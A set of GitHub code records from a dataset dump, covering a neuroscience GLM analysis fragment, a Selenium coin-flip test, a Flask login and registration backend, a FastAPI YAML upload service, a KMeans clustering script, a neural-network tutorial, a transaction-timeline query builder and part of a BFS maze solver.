coef,beta_weights,mean_score, var_score ,score_pool = Model_analysis(n, window, window2, Data,c_ind,ana_period)\n S[0,m_ind] = mean_score[0,mi]\n mean_score[mean_score 179\n\nd_list3 = good_list <= 179\n\nax_sz = 4\n\ngood_list_sep = good_list[d_list3]\n\n# Rscore = {}\nRscore = np.zeros((ax_sz+1,np.size(good_list)))\n \ny_lens = np.arange(160)\n \nfor n in np.arange(np.size(good_list,0)):\n # print(n)\n nn = good_list[n]\n nn = int(nn)\n maxS = Data[nn,c_ind-1][\"maxS\"]\n try:\n X = Data[nn,c_ind-1][\"X\"]\n intercept = Data[nn,c_ind-1][\"intercept\"]\n\n except: \n X, Y, Yhat, Model_Theta, score, intercept = glm_per_neuron(nn, t_period, prestim, window,k,c_ind,ca,maxS,1)\n Data[nn,c_ind-1] = {\"X\" : X,\"coef\" : Model_Theta, \"intercept\" : intercept, \"score\" : score, 'Y' : Y,'Yhat' : Yhat, 'maxS' : maxS}\n \n Y = Data[nn,c_ind-1][\"Y\"][:,y_lens]\n Yhat = Data[nn,c_ind-1][\"Yhat\"][:,y_lens]\n Model_Theta = Data[nn,c_ind-1][\"coef\"]\n ymean = np.ones((len(y_lens),np.size(X,0))).T*Data[nn,c_ind-1][\"intercept\"][y_lens]\n # ymean[0,:] = intercept\n \n theta3 = np.concatenate(([ymean[0,:]],Model_Theta[:,y_lens]),0)\n X2 = np.concatenate((np.ones((np.size(X,0),1)),X),1)\n \n for f in np.arange(ax_sz):\n yhat2 = X2[:,[0,f+1]] @ theta3[[0,f+1],:]\n Rscore[f,n] = 1- np.sum(np.square(Y-yhat2))/np.sum(np.square(Y-ymean))\n if Rscore[f,n] ==0:\n Rscore[f,n] = -1\n \n Rscore[ax_sz,n] = 1- np.sum(np.square(Y-Yhat))/np.sum(np.square(Y-ymean))\n # Rscore[c_ind][:,n] \n\n# scatter_ind = [np.arange(ax_sz+1)]*np.ones((ax_sz+1,len(good_list))).T\n# scatter_ind = scatter_ind.T\n\n# %% plot R score\n\n\ncmap = ['tab:purple','tab:blue','tab:red','tab:orange']\nc_ind = -1\n\nd_list = good_list > 179\n# \nd_list3 = good_list <= 179\n# d_list3 = good_list > 179\n\n\ndef make_RS(d_list):\n fig, axes = plt.subplots(1,1, figsize = (10,8))\n Rsstat = {}\n for f in np.arange(0,ax_sz):\n Rs = Rscore[f,d_list]\n Rmax = Rscore[4,d_list]\n Rmax = Rmax[Rs>0.01]\n Rs = Rs[Rs>0.01]\n \n # Rs = Rs/(Rmax+0.03)\n Rsstat[c_ind,f] = Rs\n axes.scatter(np.ones_like(Rs)*(f+(c_ind+1)*-0.3),Rs,c = cmap[f])\n axes.scatter([(f+(c_ind+1)*-0.3)],np.mean(Rs),c = 'k',s = 500, marker='_')\n # axes.boxplot(Rs,positions= [f+(c_ind+1)*-0.3])\n axes.scatter(np.ones_like(Rscore[4,d_list])*(4+(c_ind+1)*-0.3),Rscore[4,d_list])\n axes.scatter([(4+(c_ind+1)*-0.3)],np.mean(Rscore[4,d_list]),c = 'k',s = 500, marker='_')\n \n Rsstat[c_ind,4] = Rscore[4,d_list]\n \n # axes.boxplot(Rscore[c_ind][4,d_list3],positions= [4+(c_ind+1)*-0.3])\n axes.set_ylim([-0.05,0.2])\n\n return Rsstat\n\n\nRsStat_PIC = make_RS(d_list3)\nRsStat_PAC = make_RS(d_list)\n\ngood_listR = Rscore[4,:] > 0.02\n\n\n# %% Calculating best_kernel\n\n\nbest_kernel = {}\n\n\"\"\"\nfor each rule (c_ind) we have a best_kernel matrix\neach matrix contains best time_bin (ind), best coefficient and normalized model_weights\nrow 1 : best ind\nrow 2 : best category [0 1 2 3 4 ] is [\"Uncategorized\", \"Action\", \"Correct\",\"Stimuli\"]\nrow 3 to 5 : normalized weights for action, correct and stimuli\n\nwhen adding contingency\nrow 3 to 6 : contingency, action, correct, stimuli\n\nwhen adding trial history, the last row is trial history, with best category going up to 5 \n\"\"\"\n\ngood_list2 = good_list\n\n\ndef get_best_kernel(b_ind, window, window2, Data, c_ind, ana_period,good_list):\n best_kernel[c_ind] = np.zeros((b_ind,np.size(good_list,0)))\n\n\n k = 0;\n for n in good_list2:\n n = int(n)\n mi, bs, coef,beta_weights,mean_score, var_score,score_pool = Model_analysis(n, window, window2, Data,c_ind,ana_period)\n norm_coef = np.abs(coef)\n # Y_mean = np.mean(Data[n,c_ind-1][\"Y\"])\n if bs > weight_thresh:\n best_kernel[c_ind][0,k] = int(mi)\n if np.max(np.abs(coef))>var_score[0,mi]:\n best_kernel[c_ind][1,k] = int(np.argmax(np.abs(coef)))+1\n for i in np.arange(np.size(coef)):\n best_kernel[c_ind][i+2,k] = norm_coef[i] \n \n\n \n else:\n best_kernel[c_ind][2:b_ind,k] = np.ones((1,b_ind-2))*-1 \n k = k+1\n \n return best_kernel\n\nweight_thresh = 2*1e-2\n\n\n# Here we define the time period for model analysis. \n# ana_period = np.array([2000, 4000]) # (Stimulus presentation period)\n# ana_period = np.array([1500, 2500])\n# ana_period = np.array([2500, 4500])\nana_period = np.array([0, 6000])\nfor c_ind in c_list:\n if c_ind == 0 or c_ind ==-3 or c_ind == -4 or c_ind == -2:\n b_ind = 9\n elif c_ind == -1:\n b_ind = 7\n else:\n b_ind = 5\n \n best_kernel = get_best_kernel(b_ind, window, window2, Data, c_ind, ana_period,good_list)\n \n \n# %% Normalized population average of task variable weights\n\nd_list = good_list > 179\n\nd_list3 = good_list <= 179\n\nc_ind = -2\n# good_list2 = good_list[d_list & good_listR]\n\n# cat_list = best_kernel[c_ind][0,:] != 0 # Only neurons that were categorized\n\n# good_list_sep = good_list[cat_list]\n# good_list_sep = good_list[d_list & good_listR]\ngood_list_sep = good_list[:]\n\n\nweight_thresh = 2*1e-2\n\n\nif c_ind == 0 or c_ind == -2:\n cmap3 = ['tab:purple','tab:blue','tab:red','tab:olive']\n ax_sz = len(cmap3)\n clabels = [\"lick\",\"Contingency\",\"stim\",\"reward\",\"history\"]\n lstyles = ['solid','solid','solid','solid','solid']\n \n\nscore = np.zeros((160,1))\nConvdata = {}\nnorm_score_all = {};\nnorm_score_all = np.zeros((np.size(good_list_sep),np.size(score,0)))\nfor b_ind in np.arange(ax_sz):\n Convdata[b_ind] = np.zeros((np.size(good_list_sep),np.size(score,0)))\n \nfor n in np.arange(np.size(good_list_sep,0)):\n # n = int(n)\n nn = int(good_list_sep[n])\n Model_coef = Data[nn, c_ind-1][\"coef\"]\n Model_score = Data[nn, c_ind-1][\"score\"]\n\n # Model_coef = np.abs(Model_coef)/(np.max(np.abs(Model_coef)) + 0.1) # soft normalization value for model_coef\n Model_coef = Model_coef/(np.max(np.abs(Model_coef)) + 0.2) # soft normalization value for model_coef\n# \n norm_score = np.mean(Model_score, 1)\n norm_score[norm_score < weight_thresh] = 0\n norm_score = ndimage.gaussian_filter(norm_score,1)\n # norm_score[norm_score > 0] = 1 \n # if np.max(norm_score)>0:\n # norm_score = norm_score/(np.max(norm_score)+weight_thresh)\n # else:\n # norm_score = 0 \n \n # if good_listR[n] == True:\n # conv = Model_coef*norm_score\n # else: \n # conv = Model_coef*0\n if np.mean(norm_score*norm_score*1e4) > weight_thresh*1e2:\n conv = Model_coef\n else:\n conv = Model_coef*0\n \n # norm_score_all[n,:] = norm_score.T\n for b_ind in np.arange(np.size(Model_coef, 0)):\n Convdata[b_ind][n, :] = conv[b_ind, :]\n\n\nx_axis = np.arange(1, prestim+t_period, window)\nfig, axes = plt.subplots(1,1,figsize = (10,8))\n\nfor f in range(ax_sz):\n error = np.std(Convdata[f],0)/np.sqrt(np.size(good_list_sep))\n y = ndimage.gaussian_filter(np.mean(Convdata[f],0),2)\n axes.plot(x_axis*1e-3-prestim*1e-3,y,c = cmap3[f],linestyle = lstyles[f])\n axes.fill_between(x_axis*1e-3-prestim*1e-3,y-error,y+error,facecolor = cmap3[f],alpha = 0.3)\n axes.set_ylim([-0.20,0.20])\n\n# axes[1].plot(x_axis*1e-3-prestim*1e-3,ndimage.gaussian_filter(np.mean(norm_score_all,0),2))\n\ne_lines = np.array([0, 500, 500+1000, 2500+1000])\ne_lines = e_lines+500\n\n# %% Calculating weights\n\nweight = {}\np = {}\np[-1] = np.arange(140,160)\np[-2] = p[-1]\n# p[-2] = np.arange(140,160)\n\n \nfor f in np.arange(ax_sz): \n weight[-1,f]= np.zeros((1,294))\n weight[-2,f] = np.zeros((1,294)) \n for c_ind in [-1,-2]:\n if c_ind == -1:\n for n in np.arange(95,294):\n weight[c_ind,f][0,n] = np.mean(Convdata[f][n,p[c_ind]])\n if c_ind == -2:\n for n in np.arange(95):\n weight[c_ind,f][0,n] = np.mean(Convdata[f][n,p[c_ind]])\n \n \n# fig, axes = plt.subplots(1,1,figsize = (10,8))\n# axes.scatter(weight[-1,2],-weight[-2,2])\n# axes.set_xlim([-0.5,0.5])\n# axes.set_ylim([-0.5,0.5])\n\n# %% \nweight = {}\nnbunits = {}\nfor f in np.arange(ax_sz): \n nbunits[-1,f] = np.zeros((1,7))\n nbunits[-2,f] = np.zeros((1,7))\n\nfor t in np.arange(7):\n p = np.arange(t*20,t*20+20)\n for f in np.arange(ax_sz): \n weight[-1,f]= np.zeros((1,294))\n weight[-2,f] = np.zeros((1,294))\n\n for c_ind in [-1,-2]:\n if c_ind == -1:\n for n in np.arange(95,294):\n weight[c_ind,f][0,n] = np.mean(Convdata[f][n,p])\n nbunits[c_ind,f][0,t] = np.sum((weight[c_ind,f] > 0.1))/200\n \n if c_ind == -2:\n for n in np.arange(95):\n weight[c_ind,f][0,n] = np.mean(Convdata[f][n,p])\n nbunits[c_ind,f][0,t] = np.sum((weight[c_ind,f] > 0.1))/94\n\n\n\nfig, axes = plt.subplots(4,1, figsize = (8,20))\nfor f in np.arange(ax_sz):\n axes[f].plot(np.arange(7), nbunits[-1,f].T, c = cmap[f], linestyle = \"solid\")\n axes[f].plot(np.arange(7), nbunits[-2,f].T, c = cmap[f], linestyle = \"dotted\")\n \n\n\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# %%\n\nf = 2\nlist2 = (weight[-1,f] > 0.1) #* (weight[-2,f] == 0)\nlist3 = (weight[-2,f] > 0.1)# * (weight[-1,f] == 0)\nprint(np.sum(list2))\nprint(np.sum(list3))\nlist4 = (weight[-1,f] > 0)*(-weight[-2,f] > 0)\n# result = stats.linregress(weight[-1,f][list4],-weight[-2,f][list4])\n\n# print(result.rvalue)\n\n# \nfig, axes = plt.subplots(1,1,figsize = (10,8))\n\n# f = 1\n# y1 = np.mean(np.concatenate((Convdata[f][list2[0,:],:], Convdata[f][list3[0,:],:])),0)\n# s1 = np.std(np.concatenate((Convdata[f][list2[0,:],:], Convdata[f][list3[0,:],:])),0)/np.sqrt(np.sum(list2)+np.sum(list3))\n\ny1 = np.mean(Convdata[f][list2[0,:],:],0)\ns1 = np.std(Convdata[f][list2[0,:],:],0)/np.sqrt(np.sum(list2))\ny2 = np.mean(Convdata[f][list3[0,:],:],0)\ns2 = np.std(Convdata[f][list3[0,:],:],0)/np.sqrt(np.sum(list3))\n\n# take history units\n\nd = Convdata[f][list3[0,:],:]\n\n# p1 = np.arange(90,110)\n# t1 = Convdata[-1,f][list2[0,:],:][:,p1]\n\n# t2 = Convdata[-2,f][list3[0,:],:][:,p1]\n# stats.ks_2samp(np.mean(t1,1),np.mean(t2,1))\n\ny1 = ndimage.gaussian_filter(y1,2)\ny2 = ndimage.gaussian_filter(y2,2)\n\ncmap = cmap3 = ['tab:purple','tab:blue','tab:red','tab:olive']\n\naxes.plot(x_axis*1e-3-prestim*1e-3,y1,c = cmap[f],linestyle = 'solid')\naxes.fill_between(x_axis*1e-3-prestim*1e-3,y1-s1,y1+s1,facecolor = cmap[f],alpha = 0.3)\n\n\naxes.plot(x_axis*1e-3-prestim*1e-3,y2,c = cmap[f],linestyle = 'dashed')\naxes.fill_between(x_axis*1e-3-prestim*1e-3,y2-s2,y2+s2,facecolor = cmap[f],alpha = 0.3)\n\n# axes.set_ylim([-0.05,0.65])","repo_name":"johnleeuk12/LeeLab-Python","sub_path":"GLM_PPC_EJ_v4.py","file_name":"GLM_PPC_EJ_v4.py","file_ext":"py","file_size_in_byte":33289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"21211290491","text":"# 2 Feladat: Pénzfeldobás\n\nfrom selenium import webdriver\nimport time\n\nfrom selenium.webdriver.chrome.options import Options\nfrom webdriver_manager.chrome import ChromeDriverManager\n\noptions = Options()\noptions.headless = False\ndriver = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=options)\n\ndriver.get('https://black-moss-0a0440e03.azurestaticapps.net/tts4.html')\n\n# ------------------------------------------------------------------------------\n\n# felhasznált elemek definiálása:\nsub_button = driver.find_element_by_id('submit')\n\n# megszámoljuk, hogy 100 esetből hányszor lesz 'fej' az eredmény:\nnum_f = 0\nfor i in range(100):\n sub_button.click()\n time.sleep(0.1)\n result_car = driver.find_element_by_id('lastResult').text\n if result_car == 'fej':\n num_f += 1\n else:\n pass\n\nprint(num_f)\n\n\n# az eredmény értékelése:\ntry:\n assert num_f >= 30\n print('Eredmény OK!')\nexcept:\n print('Rossz eredmény, 30-nál kevesebb a \"fej\"!')\nfinally:\n time.sleep(2)\n driver.close()\n\n\n\n","repo_name":"leeltib/testauto-zarovizsga1","sub_path":"testproject/tts4.py","file_name":"tts4.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"hu","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"2904920592","text":"from crypt import methods\nfrom config import *\nfrom model import *\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n# Tentativa de um cadastro simples\n# teste da rota cadastro: curl -d '{\"email\": \"inseridoatravesdocurl\", \"nome\": \"test_user\", \"senha\": \"test_pass\", \"objetivo\": \"test_objective\"}' -X POST -H \"Content-Type:application/json\" http://localhost:5000/cadastro\n@app.route('/cadastro', methods=['GET', 'POST'])\ndef cadastro():\n if request.method == 'GET': # Se a requisição for GET\n return render_template('cadastro.html') # Retorna o Template do cadastro\n else: # Se não, ele executa o procedimento do cadastro\n # Recebe os dados do front-end atraves do Json\n resposta = jsonify({\"resultado\": \"ok\", \"detalhes\": \"ok\"})\n dados = request.get_json() #o (force=True) dispensa o Content-Type na requisição no js\n user = Usuario(email = dados['email'],nome = dados['nome'],senha = dados['senha'], objetivo = dados['objetivo'])\n user.senha = criptografar_sen(user.senha)\n try: # Tenta executar a operação de inserir o usuário no banco\n # Cria uma nova pessoa a partir dos dados\n db.session.add(user) # Adiciona a pessoa no banco\n db.session.commit() # Dá o commit no banco\n print(user)\n print('Usuário cadastrado!')\n resposta = jsonify({'Resultado': 'sucesso', 'Detalhes': 'ok'}) # Dá resposta caso o usuário for inserido\n # Caso a operação falhe\n except Exception as e: # Transforma o erro na letra 'e'\n # introduz o erro em uma variável que poderá ser exibida no front-end\n resposta = jsonify({'resultado':'erro', 'detalhes':str(e)})\n # Fora do try\n resposta.headers.add(\"Access-Control-Allow-Origin\",\"*\")\n return resposta\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login(): # Criar a função da rota\n # Se a requisição for GET \n if request.method == 'GET':\n # Retorna o template do login\n return render_template('login.html')\n # Se não for GET \n else:\n # Preparar uma resposta otimista\n resposta = jsonify({\"resultado\": \"ok\", \"detalhes\": \"ok\"})\n dados = request.get_json(force=True) # Pegar os dados do front e colocar na variavel dados\n email = dados['email'] # pega o email inserido no front em json\n senha = dados['senha'] # pega a senha inserida no front em json\n senha = senha.encode('utf-8') # Deixa a senha no padrão utf-8.\n login = verificar_senha(senha,email) \n # Faz uma consulta no banco para saber se tem outro email igual\n usuario_encontrado = Usuario.query.filter_by(email=email).first()\n # Se não encontrar emails parecidos\n if usuario_encontrado is not None and login == True:\n # criar a json web token (JWT) usando o email \n access_token = create_access_token(identity=email)\n # Retorna a (JWT) em json\n resposta = jsonify({\"resultado\":\"ok\", \"detalhes\":access_token, 'email':email})\n # Adiciona o cabeçalho de liberação de origem\n resposta.headers.add('Access-Control-Allow-Origin', '*')\n print('Login Realizado!')\n else:\n # Vai responder erro\n resposta = jsonify({\"resultado\": \"erro\", \"detalhes\": \"login e/ou senha inválido(s)\"}) \n\n # adicionar cabeçalho de liberação de origem\n resposta.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n # Retorna resposta\n return resposta # responder!\n\n\n@app.route('/inserir_conteudo', methods = ['POST', 'GET'])\ndef inserir_conteudo():\n if request.method == 'GET':\n return render_template('inserir_conteudo.html')\n else:\n resposta = jsonify({\"resultado\":\"ok\", \"detalhes\": \"ok\"})\n dados = request.get_json(Force = True)\n conteudo = Conteudo(titulo = dados[\"titulo\"], materia = dados[\"materia\"], usuario =dados[\"usuario\"])\n\napp.run(debug=True, host=\"0.0.0.0\")","repo_name":"0Neocortexx/portalEstudantil","sub_path":"version_1.1/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20892877884","text":"from fastapi import FastAPI, File, UploadFile\nfrom redis import Redis\nfrom pydantic import BaseModel\nimport yaml\nimport uvicorn\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nasync def upload_file(file: UploadFile = File(...)):\n contents = await file.read()\n try:\n data = yaml.safe_load(contents)\n except yaml.YAMLError as e:\n logger.error(f\"Failed to parse YAML data: {e}\")\n return {\"status\": \"failure\", \"message\": \"Invalid file format. Please upload a YAML file.\"}\n person = Person(**data)\n logger.info(f\"Received new person record: {person}\")\n redis.set(person.first_name, person.json())\n return {\"status\": \"success\"}\n\napp = FastAPI()\n\nredis = Redis(host='localhost', port=6379, db=0)\nclass Person(BaseModel):\n first_name: str\n last_name: str\n age: int\n\n@app.post('/upload/')\nasync def upload_file(file: UploadFile = File(...)):\n contents = await file.read()\n data = yaml.safe_load(contents)\n person = Person(**data)\n logger.info(f\"Received new person record: {person}\")\n redis.set(person.first_name, person.json())\n return {'status': 'success'}\n\n@app.get('/person/{first_name}')\nasync def get_person(first_name: str):\n data = redis.get(first_name)\n if not data:\n return {'status': 'failure', 'message': 'Person not found'}\n person = Person.parse_raw(data)\n return person.dict()\n\nif __name__ == '__main__':\n uvicorn.run(app, host='0.0.0.0', port=8000)\n\n","repo_name":"Hemantht1007/hemanth-assessment","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43825792387","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 22 20:11:54 2019\n\n@author: Yatri Kalathia\n\"\"\"\n\n#SKLearn assignment Question 2\n\nimport pandas as pd\nfrom sklearn import datasets\nfrom sklearn.cluster import KMeans \nimport matplotlib.pyplot as plt\n\n#loading iris dataset\niris_dataset = datasets.load_iris()\n\n#converting to pandas dataframe\niris_data = pd.DataFrame(iris_dataset.data)\n\niris_features = iris_data.iloc[:, [0,1, 2, 3]].values\n\nno_of_clust = []\n\n#creating n number of CLusters\nfor i in range(1, 13):\n kmeans = KMeans(n_clusters = i, init = 'k-means++', max_iter = 300, n_init = 10, random_state = 0)\n kmeans.fit(iris_features)\n no_of_clust.append(kmeans.inertia_)\n \n \nfor item in range(len(no_of_clust)-1):\n print(abs(no_of_clust[item+1] - no_of_clust[item])) \n\n \n#Plotting the results onto a line graph to observe elbow heuristic\nplt.plot(range(1, 13), no_of_clust)\nplt.title('The elbow method')\nplt.xlabel('Number of clusters')\nplt.ylabel('Values within Cluster Sum of Squares') \nplt.show()\n\n\n","repo_name":"yatrik11/FE595_SKLearn_Assignment","sub_path":"SKLearn_Assignment_2.py","file_name":"SKLearn_Assignment_2.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"817593570","text":"#import code from last time\nfrom part5 import *\nfrom scipy import optimize\n\n\ndef computeGradientsCheck(N, X, y):\n paramsInitial = N.getParams()\n chkgrad = np.zeros(paramsInitial.shape)\n perturb = np.zeros(paramsInitial.shape)\n e = 1e-4\n\n for p in range(len(paramsInitial)):\n #Set perturbation vector\n perturb[p] = e\n N.setParams(paramsInitial + perturb)\n loss2 = N.costFunction(X, y)\n\n N.setParams(paramsInitial - perturb)\n loss1 = N.costFunction(X, y)\n\n #Compute Check Gradient\n chkgrad[p] = (loss2 - loss1) / (2*e)\n\n #Return the value we changed to zero:\n perturb[p] = 0\n\n #Return Params to original value:\n N.setParams(paramsInitial)\n\n return chkgrad\n\n#New complete class, with changes:\nclass NeuralNetwork(object):\n def __init__(self, Lambda=0): \n #Define Hyperparameters\n self.inputLayerSize = 2\n self.outputLayerSize = 1\n self.hiddenLayerSize = 3\n \n #Weights (parameters)\n self.W1 = np.random.randn(self.inputLayerSize,self.hiddenLayerSize)\n self.W2 = np.random.randn(self.hiddenLayerSize,self.outputLayerSize)\n \n #Regularization Parameter:\n self.Lambda = Lambda\n \n def forwardPropagation(self, X):\n #Propogate inputs though network\n self.z2 = np.dot(X, self.W1)\n self.a2 = self.sigmoid(self.z2)\n self.z3 = np.dot(self.a2, self.W2)\n yHat = self.sigmoid(self.z3) \n return yHat\n \n def sigmoid(self, z):\n #Apply sigmoid activation function to scalar, vector, or matrix\n return 1/(1+np.exp(-z))\n \n def sigmoidPrime(self,z):\n #Gradient of sigmoid\n return np.exp(-z)/((1+np.exp(-z))**2)\n \n def costFunction(self, X, y):\n #Compute cost for given X,y, use weights already stored in class.\n self.yHat = self.forwardPropagation(X)\n J = 0.5*sum((y-self.yHat)**2)/X.shape[0] + (self.Lambda/2)*(np.sum(self.W1**2)+np.sum(self.W2**2))\n return J\n \n def costFunctionPrime(self, X, y):\n #Compute derivative with respect to W and W2 for a given X and y:\n self.yHat = self.forwardPropagation(X)\n \n delta3 = np.multiply(-(y-self.yHat), self.sigmoidPrime(self.z3))\n #Add gradient of regularization term:\n dJdW2 = np.dot(self.a2.T, delta3)/X.shape[0] + self.Lambda*self.W2\n \n delta2 = np.dot(delta3, self.W2.T)*self.sigmoidPrime(self.z2)\n #Add gradient of regularization term:\n dJdW1 = np.dot(X.T, delta2)/X.shape[0] + self.Lambda*self.W1\n \n return dJdW1, dJdW2\n \n #Helper functions for interacting with other methods/classes\n def getParams(self):\n #Get W1 and W2 Rolled into vector:\n params = np.concatenate((self.W1.ravel(), self.W2.ravel()))\n return params\n \n def setParams(self, params):\n #Set W1 and W2 using single parameter vector:\n W1_start = 0\n W1_end = self.hiddenLayerSize*self.inputLayerSize\n self.W1 = np.reshape(params[W1_start:W1_end], \\\n (self.inputLayerSize, self.hiddenLayerSize))\n W2_end = W1_end + self.hiddenLayerSize*self.outputLayerSize\n self.W2 = np.reshape(params[W1_end:W2_end], \\\n (self.hiddenLayerSize, self.outputLayerSize))\n \n def computeGradients(self, X, y):\n dJdW1, dJdW2 = self.costFunctionPrime(X, y)\n return np.concatenate((dJdW1.ravel(), dJdW2.ravel()))\n\n\nclass trainer(object):\n def __init__(self, N):\n #Make Local reference to network:\n self.N = N\n \n def callbackF(self, params):\n self.N.setParams(params)\n self.J.append(self.N.costFunction(self.X, self.y))\n self.testJ.append(self.N.costFunction(self.testX, self.testY))\n \n def costFunctionWrapper(self, params, X, y):\n self.N.setParams(params)\n cost = self.N.costFunction(X, y)\n grad = self.N.computeGradients(X,y) \n return cost, grad\n \n def train(self, trainX, trainY, testX, testY):\n #Make an internal variable for the callback function:\n self.X = trainX\n self.y = trainY \n self.testX = testX\n self.testY = testY\n\n #Make empty list to store training costs:\n self.J = []\n self.testJ = []\n \n params0 = self.N.getParams()\n\n options = {'maxiter': 200, 'disp' : True}\n _res = optimize.minimize(self.costFunctionWrapper, params0, \\\n jac=True, method='BFGS', \\\n args=(trainX, trainY), options=options, \\\n callback=self.callbackF)\n\n self.N.setParams(_res.x)\n self.optimizationResults = _res\n\n\ndef computeGradientsCheck(N, X, y):\n paramsInitial = N.getParams()\n chkgrad = np.zeros(paramsInitial.shape)\n perturb = np.zeros(paramsInitial.shape)\n e = 1e-4\n\n for p in range(len(paramsInitial)):\n #Set perturbation vector\n perturb[p] = e\n N.setParams(paramsInitial + perturb)\n loss2 = N.costFunction(X, y)\n\n N.setParams(paramsInitial - perturb)\n loss1 = N.costFunction(X, y)\n\n #Compute Check Gradient\n chkgrad[p] = (loss2 - loss1) / (2*e)\n\n #Return the value we changed to zero:\n perturb[p] = 0\n\n #Return Params to original value:\n N.setParams(paramsInitial)\n\n return chkgrad\n\n","repo_name":"Einsteinish/Artificial-Neural-Networks-with-Jupyter","sub_path":"part7.py","file_name":"part7.py","file_ext":"py","file_size_in_byte":5635,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"18"} +{"seq_id":"70823442279","text":"from dataclasses import dataclass\nfrom datetime import date, datetime\nfrom app import database\nfrom app.transactions.filter import TransactionFilter\nfrom app.transactions.transaction_model import Query\n\n\n@dataclass\nclass TimelineMonth:\n amount: int\n month_start_date: date\n l1: str = None\n l2: str = None\n l3: str = None\n\n def __eq__(self, other: \"TimelineMonth\") -> bool:\n return (\n self.amount == other.amount\n and self.month_start_date == other.month_start_date\n and self.l1 == other.l1\n and self.l2 == other.l2\n and self.l3 == other.l3\n )\n\n\ndef get_transaction_timeline(\n filter: TransactionFilter, group_by_tag: bool = True\n) -> list[TimelineMonth]:\n qb = (\n Query(alias=\"t.\")\n .by_account(filter.account)\n .amount_from(filter.min_value)\n .amount_to(filter.max_value)\n .by_tag_filter(filter.tags)\n )\n conditions = qb.build_conditions(query=\"\", include_where=False)\n\n date_qb = Query(alias=\"dt.\").date_from(filter.date_from).date_to(filter.date_to)\n date_conditions = date_qb.build()\n\n tag_qb = Query(alias=\"tr.\").by_tag_filter(filter.tags)\n tag_conditions = tag_qb.build()\n print(tag_conditions, tag_qb.get_inputs())\n\n include_l1 = group_by_tag and len(filter.tags.l1 or [])\n include_l2 = group_by_tag and len(filter.tags.l2 or [])\n include_l3 = group_by_tag and len(filter.tags.l3 or [])\n\n # If there is no filtering, group by l1\n if not include_l1 and not include_l2 and not include_l3:\n include_l1 = True\n\n l1_column = \", tags.l1\" if include_l1 else \"\"\n l2_column = \", tags.l2\" if include_l2 else \"\"\n l3_column = \", tags.l3\" if include_l3 else \"\"\n\n tag_columns = []\n if include_l1:\n tag_columns.append(\"tr.l1\")\n if include_l2:\n tag_columns.append(\"tr.l2\")\n if include_l3:\n tag_columns.append(\"tr.l3\")\n\n tag_join_conditions = []\n if include_l1:\n tag_join_conditions.append(\"t.l1 = tags.l1\")\n if include_l2:\n tag_join_conditions.append(\"t.l2 = tags.l2\")\n if include_l3:\n tag_join_conditions.append(\"t.l3 = tags.l3\")\n tag_join_conditions.append(\"strftime('%Y-%m', t.date, 'unixepoch') = months.month\")\n\n group_by = f\"{l1_column} {l2_column} {l3_column}\" if group_by_tag else \"\"\n\n query = f\"\"\"SELECT \n SUM(COALESCE(t.amount, 0)) as total, \n months.month\n {l1_column}\n {l2_column}\n {l3_column}\n FROM \n (SELECT DISTINCT {\", \".join(tag_columns)} FROM transactions tr {tag_conditions}) as tags,\n (SELECT DISTINCT strftime('%Y-%m', dt.date, 'unixepoch') month from transactions dt {date_conditions}) as months\n LEFT JOIN Transactions t \n {\"ON \" + \" AND \".join(tag_join_conditions)}\n {conditions}\n GROUP BY \n months.month\n {group_by}\n ORDER BY \n months.month\n {group_by}\"\"\"\n\n print(query)\n\n inputs = [*date_qb.get_inputs(), *qb.get_inputs(), *tag_qb.get_inputs()]\n\n amounts = database.select(query, inputs)\n\n date_format = \"%Y-%m\"\n\n return [\n TimelineMonth(\n amount=row.total,\n month_start_date=datetime.strptime(row[1], date_format).date(),\n l1=row.l1 if include_l1 else None,\n l2=row.l2 if include_l2 else None,\n l3=row.l3 if include_l3 else None,\n )\n for row in amounts\n ]\n","repo_name":"TheIthorian/Transactions","sub_path":"src/app/transactions/timeline.py","file_name":"timeline.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"74939811559","text":"from collections import deque\n\ndef solution(maps):\n rows = len(maps)\n cols = len(maps[0])\n \n # 방향 설정 (상, 하, 좌, 우)\n directions = [(-1, 0), (1, 0), (0, -1), (0, 1)]\n \n # 시작 지점, 출구, 레버 위치 찾기\n start = None\n end = None\n lever = None\n for i in range(rows):\n for j in range(cols):\n if maps[i][j] == 'S':\n start = (i, j)\n elif maps[i][j] == 'E':\n end = (i, j)\n elif maps[i][j] == 'L':\n lever = (i, j)\n \n # BFS 탐색 시작\n queue = deque([(start[0], start[1], 0)]) # (행, 열, 현재까지 걸린 시간)\n visited = set([(start[0], start[1])])\n \n while queue:\n row, col, time = queue.popleft()\n \n if (row, col) == (end[0], end[1]):\n return time\n \n for dr, dc in directions:\n new_row, new_col = row + dr, col + dc # 사방으로 한 칸씩 진행\n \n if 0 <= new_row < rows and 0 <= new_col < cols and (new_row, new_col) not in visited:\n if maps[new_row][new_col] != 'X':\n queue.append((new_row, new_col, time + 1))\n visited.add((new_row, new_col))\n \n # 레버를 만난 경우\n if (new_row, new_col) == lever:\n queue.append((new_row, new_col, time + 2)) # 레버를 당기는 시간 추가\n \n # 탈출할 수 없는 경우\n return -1\nmaps = [\n \"SOOOOXXOOOOX\",\n \"XOXXOOXOOXXX\",\n \"OOOOOXOOOOOX\",\n \"OXXXXXOOXXXX\",\n 